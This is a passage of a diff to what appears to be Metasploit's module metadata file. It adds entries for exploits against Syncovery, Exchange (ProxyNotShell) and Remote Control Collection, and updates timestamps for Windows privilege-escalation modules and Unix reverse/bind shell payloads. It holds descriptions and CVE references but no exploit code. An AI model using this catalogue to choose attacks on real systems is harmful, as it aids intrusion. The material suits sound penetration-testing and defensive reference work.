+    "description": "This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux.\n          Successful exploitation results in remote code execution under the context of the root user.\n\n          Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.\n          Jobs can contain arbitrary system commands and will be executed as root.\n          A valid username and password or a session token is needed to exploit the vulnerability.\n          The profile and its log file will be deleted afterwards to disguise the attack.\n\n          The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.",
+    "references": [
+      "URL-https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/",
+      "CVE-2022-36534"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Syncovery for Linux < 9.48j"
+    ],
+    "mod_time": "2022-12-14 08:38:20 +0000",
+    "path": "/modules/exploits/unix/http/syncovery_linux_rce_2022_36534.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/syncovery_linux_rce_2022_36534",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_unix/http/tnftp_savefile": {
    "name": "tnftp \"savefile\" Arbitrary Command Execution",
    "fullname": "exploit/unix/http/tnftp_savefile",
@@ -105538,7 +106564,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/exploits/unix/smtp/exim4_string_format.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/exim4_string_format",
@@ -131862,7 +132888,7 @@
      "John Page (aka hyp3rlinx)",
      "Brenner Little"
    ],
-    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files <c:Url> node param which takes an expected website value, however if an attacker references an\n        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n        Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n        Making matters worse is if the the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n        The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.",
+    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files <c:Url> node param which takes an expected website value, however if an attacker references an\n        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n        Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n        Making matters worse is if the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n        The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.",
    "references": [
      "EDB-46188",
      "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt",
@@ -131880,7 +132906,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/microsoft_windows_contact",
@@ -140770,7 +141796,7 @@
      "v9.2.0 - v9.2.1",
      "v9.2.2 - v9.3.0-RC"
    ],
-    "mod_time": "2022-03-10 10:28:25 +0000",
+    "mod_time": "2022-12-04 17:50:24 +0000",
    "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/dnn_cookie_deserialization_rce",
@@ -141765,6 +142791,79 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/exchange_proxynotshell_rce": {
+    "name": "Microsoft Exchange ProxyNotShell RCE",
+    "fullname": "exploit/windows/http/exchange_proxynotshell_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-28",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "Spencer McIntyre",
+      "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q",
+      "Piotr Bazydło",
+      "Rich Warren",
+      "Soroush Dalili"
+    ],
+    "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n          that, when combined, allow an authenticated attacker to interact with\n          the Exchange Powershell backend (CVE-2022-41040), where a\n          deserialization flaw can be leveraged to obtain code execution\n          (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n          These vulnerabilities were patched in November 2022.",
+    "references": [
+      "CVE-2022-41040",
+      "CVE-2022-41082",
+      "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend",
+      "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/",
+      "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9",
+      "URL-https://rw.md/2022/11/09/ProxyNotRelay.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x64, x86",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2022-11-28 10:06:14 +0000",
+    "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/exchange_proxynotshell_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "ProxyNotShell"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/exchange_proxyshell_rce": {
    "name": "Microsoft Exchange ProxyShell RCE",
    "fullname": "exploit/windows/http/exchange_proxyshell_rce",
@@ -141818,7 +142917,7 @@
      "Windows Dropper",
      "Windows Command"
    ],
-    "mod_time": "2021-11-10 11:12:38 +0000",
+    "mod_time": "2022-12-02 15:55:10 +0000",
    "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/exchange_proxyshell_rce",
@@ -151401,7 +152500,7 @@
    "targets": [
      "Adobe Reader X 10.1.4 / Windows 7 SP1"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb",
    "is_install_path": true,
    "ref_name": "windows/local/adobe_sandbox_adobecollabsync",
@@ -151979,7 +153078,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_dotnet_profiler",
@@ -152123,7 +153222,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_injection.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_injection",
@@ -152211,7 +153310,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_sdclt",
@@ -152450,7 +153549,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_windows_store_reg",
@@ -152783,7 +153882,7 @@
      "unamer",
      "timwr"
    ],
-    "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n            within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n            to write a limited amount of controlled data to an attacker controlled address\n            in kernel memory. By utilizing this vulnerability to execute controlled writes\n            to kernel memory, an attacker can gain arbitrary code execution\n            as the SYSTEM user.\n\n            This module has been tested against Windows 7 x64 SP1. Offsets within the\n            exploit code may need to be adjusted to work with other versions of Windows.\n            The exploit can only be triggered once against the target and can cause the\n            target machine to reboot when the session is terminated.",
+    "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n          within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n          to write a limited amount of controlled data to an attacker controlled address\n          in kernel memory. By utilizing this vulnerability to execute controlled writes\n          to kernel memory, an attacker can gain arbitrary code execution\n          as the SYSTEM user.\n\n          This module has been tested against Windows 7 x64 SP1. Offsets within the\n          exploit code may need to be adjusted to work with other versions of Windows.\n          The exploit can only be triggered once against the target and can cause the\n          target machine to reboot when the session is terminated.",
    "references": [
      "CVE-2019-1458",
      "URL-https://github.com/unamer/CVE-2019-1458",
@@ -152803,7 +153902,7 @@
    "targets": [
      "Windows 7 x64"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2019_1458_wizardopium",
@@ -153139,7 +154238,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_1313_system_orchestrator",
@@ -153147,6 +154246,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -153188,7 +154297,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_1337_printerdemon",
@@ -153196,6 +154305,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -154248,7 +155367,7 @@
      "Windows XP SP2 / SP3",
      "Windows Server 2003 SP2"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms11_080_afdjoinleaf",
@@ -154258,6 +155377,13 @@
    "notes": {
      "Stability": [
        "crash-os-restarts"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
      ]
    },
    "session_types": [
@@ -156166,7 +157292,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2022-04-21 15:33:42 +0000",
+    "mod_time": "2022-12-09 11:24:16 +0000",
    "path": "/modules/exploits/windows/local/s4u_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/s4u_persistence",
@@ -156336,7 +157462,7 @@
    "name": "Windows Unquoted Service Path Privilege Escalation",
    "fullname": "exploit/windows/local/unquoted_service_path",
    "aliases": [
-      "exploits/windows/local/trusted_service_path"
+
    ],
    "rank": 600,
    "disclosure_date": "2001-10-25",
@@ -156345,7 +157471,7 @@
      "sinn3r <sinn3r@metasploit.com>",
      "h00die"
    ],
-    "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n          is handled.  When the lpApplicationName contains a space, the file name is\n          ambiguous.  Take this file path as example: C:\\program files\\hello.exe;\n          The Windows API will try to interpret this as two possible paths:\n          C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n          To some software developers, this is an unexpected behavior, which becomes a\n          security problem if an attacker is able to place a malicious executable in one\n          of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n          Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n          same problem.\n\n          The offensive technique is also described in Writing Secure Code (2nd Edition),\n          Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n          This technique was previously called Trusted Service Path, but is more commonly\n          known as Unquoted Service Path.\n\n          The service exploited won't start until the payload written to disk is removed.\n          Manual cleanup is required.",
+    "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n          is handled.  When the lpApplicationName contains a space, the file name is\n          ambiguous.  Take this file path as example: C:\\program files\\hello.exe;\n          The Windows API will try to interpret this as two possible paths:\n          C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n          To some software developers, this is an unexpected behavior, which becomes a\n          security problem if an attacker is able to place a malicious executable in one\n          of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n          Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n          same problem.\n\n          The offensive technique is also described in Writing Secure Code (2nd Edition),\n          Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n          This technique was previously called Trusted Service Path, but is more commonly\n          known as Unquoted Service Path.\n\n          The service exploited won't start until the payload written to disk is removed.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx",
      "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us",
@@ -156363,7 +157489,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-01-05 09:50:40 +0000",
    "path": "/modules/exploits/windows/local/unquoted_service_path.rb",
    "is_install_path": true,
    "ref_name": "windows/local/unquoted_service_path",
@@ -161264,6 +162390,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/remote_control_collection_rce": {
+    "name": "Remote Control Collection RCE",
+    "fullname": "exploit/windows/misc/remote_control_collection_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-20",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "H4rk3nz0"
+    ],
+    "description": "This module utilizes the Remote Control Server's, part\n          of the Remote Control Collection by Steppschuh, protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 3.1.1.12, current at the time of module writing",
+    "references": [
+      "URL-http://remote-control-collection.com",
+      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 1926,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "default"
+    ],
+    "mod_time": "2022-10-28 15:03:39 +0000",
+    "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/remote_control_collection_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/misc/remote_mouse_rce": {
    "name": "Remote Mouse RCE",
    "fullname": "exploit/windows/misc/remote_mouse_rce",
@@ -171594,7 +172772,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -171628,7 +172806,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_inetd",
@@ -171665,7 +172843,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_jjs",
@@ -171699,7 +172877,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -171735,7 +172913,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat",
@@ -171769,7 +172947,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping",
@@ -171803,7 +172981,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -171872,7 +173050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl",
@@ -171907,7 +173085,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -171941,7 +173119,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_r",
@@ -171975,7 +173153,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby",
@@ -172009,7 +173187,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -172043,7 +173221,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_socat_udp",
@@ -172112,7 +173290,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_zsh",
@@ -172214,7 +173392,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/pingback_bind",
@@ -172248,7 +173426,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/pingback_reverse",
@@ -172870,7 +174048,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse",
@@ -172940,7 +174118,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash",
@@ -172974,7 +174152,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_telnet_ssl",
@@ -172999,7 +174177,7 @@
      "hdm <x@hdm.io>",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n        This will not work on circa 2009 and older Debian-based Linux\n        distributions (including Ubuntu) because they compile bash\n        without the /dev/udp feature.",
+    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n          This will not work on circa 2009 and older Debian-based Linux\n          distributions (including Ubuntu) because they compile bash\n          without the /dev/udp feature.",
    "references": [

    ],
@@ -173009,7 +174187,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_udp",
@@ -173046,7 +174224,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_jjs",
@@ -173080,7 +174258,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ksh",
@@ -173114,7 +174292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_lua",
@@ -173148,7 +174326,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ncat_ssl",
@@ -173184,7 +174362,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat",
@@ -173218,7 +174396,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -173286,7 +174464,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_openssl",
@@ -173320,7 +174498,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl",
@@ -173354,7 +174532,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -173388,7 +174566,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_php_ssl",
@@ -173422,7 +174600,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python",
@@ -173456,7 +174634,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-08 10:26:27 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -173490,7 +174668,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_r",
@@ -173524,7 +174702,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby",
@@ -173558,7 +174736,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ruby_ssl",
@@ -173592,7 +174770,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
